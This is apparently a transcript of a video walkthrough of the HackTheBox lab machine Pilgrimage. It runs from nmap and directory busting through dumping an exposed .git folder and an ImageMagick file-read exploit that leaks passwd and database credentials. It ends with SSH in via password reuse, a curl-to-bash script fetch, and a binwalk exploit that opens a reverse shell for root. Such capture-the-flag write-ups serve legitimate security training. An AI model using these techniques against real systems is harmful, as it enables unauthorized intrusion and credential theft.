Hello everyone. Today we're doing Pilgrimage from HackTheBox, which is an easy rated machine. I like this one because one of the primary paths in has a .git directory that is publicly accessible on the website. I've personally seen this, especially with smaller organizations that don't have a real robust build and deploy process. And an engineer just builds locally, pushes everything up inside of a Git repo, and then clones that repo down into a server with, yeah. I'm sure larger organizations do this, especially with like pilot or POC programs, but I see it more and more with smaller startups or smaller organizations. Um, with that, there are the primary way in is the website, a image shrinking website has a vulnerability inside of one of the applications that it uses to actually shrink the image, and that gives us some information disclosure by being able to look around inside of the box. The website itself houses username and passwords. We're able to look at the database, and with password reuse, we're actually able to get user on the machine. Once we get user, there's a script that is running on the machine that's monitoring a directory that is using binwalk, and binwalk is vulnerable to a specially crafted file that we upload, and that gives us a reverse shell to root. With that, let's dive in. All right, to start off with, we're going to set an environment variable target to the IP address 10.10.11.219. And then from that, we're going to run nmap. So sudo nmap, the target environment variable, -a, -v, make it a little bit more verbose, -p, for all the ports, and then -on for nmap out. This can take a while, so I have already ran it. So let's list out the content. So nmap out. And then port 22 is open SSH 8.4 P1, thinks it's the Debian machine, and then it's also running port 80, and then does not follow redirect to pilgrimage.hackthebox. And then nothing really of note after that. One of the paths in is actually a .git directory, which nmap has default scripts, which we run through the -a command that finds it, but it didn't redirect to the website, and so wasn't actually able to get it. And so I'll demonstrate. So if you go to sudo vim etc hosts, and then if you do pilgrimage, and then 10.10.11.219, not that many 219s. 10.11.219. Pilgrimage to HackTheBox. And if we run that again, sudo nmap target instead of -b-, we'll do just 80. And it runs against it. And while that's thinking about itself, you can actually go to the website, HackTheBox. Let's push that over, and if we see what spat out at us is http get repo found. And so that's one way of finding it. Another way that you can actually find it, or should have found it, is running directory busting. So if you do Ferrex Buster U, which is pilgrimage, HackTheBox, and then wordless, user share wordless, secless actually. Secless, discovery, web content, and then we'll do ref small words. Text, yep. And then non-recursive, I don't want to blast everything inside of the Git folder. That'll take literally forever. And then -o for Ferrex, port, and then root directory. Did I spell that right? Could not connect. Oh, HTTPS. Okay. We actually specify HTTP. There we go. And there it is, .git directory. So I can kind of let it run in the background, but whenever we go to the website, it is a like save space by shrinking it, online image shrinker. You upload a file, and then it shrinks it and spits it back out to you. Some of the other things to note is there's a register and then log on. So it is housing username and password on the back end. So if you register, hello there, and then password, hello there. and then just original image name, and then trunken. So yeah, and go home. But the .git directory is really what we're more interested in. So let's actually cancel that out. The tool that I use is Git Dumper, and then it needs the website, so pilgrimage.hackthebox, and then the actual spit out, so git out. If I run it correctly, Git Dumper, Git Dumper, help. URL, yep, the output directory, which should be this one, right? Git Dumper, help. What was the issue then? Pilgrimage.git head, no schema supplied. Perhaps you meant, it's probably redirecting to HTTPS. Okay, so git dumper up some git dumper, and let's actually put in HTTP. There we go. Now it spits everything out. For that, we can actually go in to get out. We have assets, dashboard, which is dashboard.php, which is probably what we're hitting, and then we have logon as well. The log out, log in down at the bottom left hand corner. So, and then index.php. One thing to note is magic. And so this is, let's do LA. This is an actual binary that we can run. So if you do magic, should spit everything out. Magic, invalid arguments, you can get a version, actually run it. Vision. Image magic 7.10. And we actually input this. There's a vulnerability that gives us vulnerability information disclosure. My Lanta, this is light theme. That's not acceptable. So yeah, image magic. It actually talks about it in one of these posts where it was like a group that was on an engagement, and they found two vulnerabilities. One is denial of service, which is not really what we're interested in. We're more interested in the information disclosure, being able to look around. LFI, there's actually exploit DB. Yeah, there's the PUC. So this is what we can actually run. So we grab that. And then where was it? Is it this one? Intro, build, let me zoom out. Method, background history. Yeah. Anyway, proof of concept, bug discovered, image magic, 0 days. And yeah, they were on engagement. They found the two vulnerabilities, denial of service, and then the other one is arbitrary remote leak or information disclosure, where you can pull stuff out. It does need to, actually, the application, the image magic, needs to be able to read the file that you want to. And so, as always, this is a Debian machine, so it's Linux. We can look at etc password, and so that's how we can test it out, essentially. So git clone. Let's back up. Let's make their work directory, workstation actually. CD workstation, and then git clone. Actually, clone that. I'm gonna go in CVE, and then it has us run cargo, and then etc password. Yep. So everyone should be able to hit that file. So perfect. And so it spat out the image.png, and this is actually what you upload into the website. So let's choose a file. Let's go to wall, CTF, pilgrimage, workstation, CVE, and then image. Upload it, it's just a red square. And then shrink it. And then it gives us like, hey, this is where you can download it. That's it. But the information that we want is actually housed inside of the image. And so we actually need to perform a wget on the image. We'll pull it down. And then from there, we can do identify and then verbose, and then 65, that long string, spits it out, and then this is the block that we're really interested in. That's all the information that's housed in there. So PNG, yep, just kind of basic information. Let's scroll down. There we go. Basic information. Grab this. Copy pasta. And then if we go back to the POC, convert the image, resize it. Oh, that's what the web server is actually doing. And then we have identify verbose. We did that as well, and then it runs a Python command of printing out the entire string and then converting it from hex. This is one huge long string, whereas if we do what I just had, it's not actually one long string. There's line breaks in it, or new lines, and so you kind of have to walk through the steps of that. Or you can use one of my favorite tools, CyberChef, to do it for you. So input, throw that in there. And as we saw in the command, it's converting it from hex. So let's do from hex, auto, perfect. And there we go. We can actually see there's root, daemon. We can actually pull this stuff out. There's also Emily is on the machine. Now, I pointed to this earlier, and that's the way in, essentially, is there is a username and password being stored on the website. So we also have the let me back up. We actually have the kind of website, essentially. So if we actually go to get out, there we go. I just came up with that name and it's great. Anyway, so let's go to cat login at PHP. And we can see if we scroll up, where is it actually sending the username and password to? Let's scroll up, scroll up, scroll up. Username and password, there we go, right here. So session start, if session user dashboard PSP, it grabs the username and password. The database setting a variable is going to be SQLite. And then this is actually where the database is going to be. And so if the website can read it via the vulnerability through image magic, we should be able to pull this into an image. So let's grab this. And then let's go back to our terminal. Go back to our workstation. And then go into CVE. And then if we run the, what was the command? It was run? No, it was cargo. There we go. Cargo run. And then the file. Var db image pilgrimage. Spat that out again. It re-uploaded it as image.png, so let's go do that again. Choose a file. Not that one, we've already done it. Shrink. And it spat out a brand new file for us. Or image, excuse me, shrunken image. And do the same thing, wget. Last one is d6f. Let's do identify verbose. And then, nope, not that one. Yep, 6f. And then a whole laundry list of zeros. So these are pretty much no data. We can rip these out. The tool that I like using, the CyberChef, it's not particularly happy with all these since it has to convert all of these to zeros. There's a whole bunch of block of data. And then if we keep going, I'm sure there's a way you can pull this out better. But you're just going to have to suffer through me copy and pasting. Yeah, going through, you can see at the top, SQLite format, a whole bunch of other characters. Scrolling down, stable images, create table images, database user, create user, a couple of things that we can do. It looks like not tables, but like columns. Just keep scrolling down. Hey, there I am. Hello there, hello there. Then we also have Emily, a big chunky boy. Let's pause this. How do I stop? Yeah, rush on the system. There you go. Let's grab that before CyberChef dies. Let's get out of there. Post that. So Emily is the username, as you saw from the Etsy password. And then a big chunky boy is the password. So let's clear that out if there's password reuse, which on this box there is. So SSH Emily, add our target, then paste in that password, and we're in. All right, now that we're inside, we can LSSLA, just look around. We have a .git config that we can read. Sometimes you get lucky and there's perhaps a password inside of here, depending upon the authentication that was used. We also have the good old user.txt, 33 characters, perfect. We do have a password, so sudo-shell, run that. And we can't run any sudo privileges on the box, so. From there, let's open up a new terminal, and then cd inside of www, and then let's copy downloads, then piece.sh. Yep. Copy. Yeah, I want to put it here. lp.sh. Yep. Perfect. Okay, and then we'll do Python 3 HTTP server. Serve that up on port 8000, and then let's do curl 10 10 14 23 8000 lp.sh. Let's do something with that instead of create a whole bunch of mess on the screen. And let's do that again, but pipe that over to bash. And while that is running in the background, specifically we were looking for, in this case, like there's an unusual, what do you call it? There's an unusual file on the system that is flagged via red. So should make this a little bit better. There we go. So some processes we see specifically within root, we can see bin bash, user bin, malware scan.sh. Never seen that before, so you can go check that out. Then you can also, it's also found in here as like another interesting file of like, hey, I've never seen this before. So it should be like one of the sections. SSH config, hosts. And I'm pretty sure I scrolled past it. But keep going. Interesting files with interesting permissions. Nothing there. Nothing there. Emily.user.text. Same thing again. Malware scan. And it didn't flag it as red, but I thought it was interesting that it's hiding in the S-bin. So you can actually go there. So I should go all the way down to the bottom. Clear this out. It was user sbin malware.sh. Or what was it? Oh no, please. Yeah. Malware scan.sh. Version died. Let's cat it out. There we go. So this is just a executable script, or it's a script that is looking for executables and Microsoft executables. And it looks like it's tailing the var www pilgrimage.hackthebox shrunk directory, which we saw on the website that is actually where new files are going. And it looks like it's just tailing it. And whenever new files are uploaded inside of it, it runs the user local bin walk with the -e option. So we can actually grab this, copy, run it, and then it spits a whole bunch of noise at us. If we do version, no, version -v, no, not at all. Okay. If we scroll up, we can see the v2.3.2, and if we actually grab this, vulnerability. There is a exploit db. It's actually a script that runs this. And then if we go into actual vulnerability. It's a path traversal that affects our particular version, but it goes all the way up to 233, excuse me. And then by crafting a malicious PFS file, you can get Binwalk's PFS extractor through the -E option. It can pull in, can achieve by building a PFS file system that, upon extraction, would extract a malicious Binwalk module into the folder. .config binwalk plugins. Yep. So if we go to the actual code, the RC code, we have this from hex, then this long string of which mess. But if we go back to CyberChef, block, sure. CyberChef. There we go. Anyway, throw that in there, and then we do from hex. And we can see PFS, and then it's actually going up a couple directories, and then going to .config binwalk plugins binwalk.py. So that's exactly what it's doing. Let's go back here, and then import binwalk plugin, import OS, shuttle, and then looks like right here it's doing some just basic reverse shell. My goodness, I forgot the name. Wow. Okay. So a couple of arguments. We have a file IP and then port path to input .png file. So we need a .png and then IP to a netcat listener. That's probably us, and then port netcat listener. So also us. So let's go grab a .png. Let's do cat png. Let's go here, grab this guy, qcat, save image as cat, set of downloads, and then since the exploit is inside of exploit.db, we can actually use search exploit. So let's go up a directory, and then go inside of workstation, and then we're going to do search exploit. We're going to mirror, and then you can just download the script from this little button right here, but I like grabbing the ID, throwing it in, should download inside of this directory, and there it is. So let's run Python 3, 512. Actually, let's grab the kitty. Move, downloads cat, cat.png. We're going to move inside of this directory, and we're going to do Python 3, 512, cat, png, our IP address, and then 9001. Throw that in here. And we now have binwalk. So let's just call this something else. Let's actually call it remove cat.png. And then move binwalk to the new cat. So let's actually move cat.png, go up a directory, and then push that inside of www. Let's go inside there. Clear the screen. Python 3 module HTTP server port 8000. Let's go inside of here. So binwalk. Now we have to place the actual I don't know, poison file essentially inside of the directory that it's looking for. It's looking for this one specifically. So let's copy this. Let's go inside of that directory, and then let's perform a wget on 10, 10, 14, 23, 8000, and then cat.png. All while creating another terminal with netcat listening on port 9001. We do that, and then immediately we get a connection from our target. We'll do ID. We are now root. Let's go inside of root's directory. We actually do bin bash. No, we don't do anything cool. Okay. And then we see reset.sh, and they actually have root.txt. So word count root.txt. There we go. That's the box. Thanks for watching.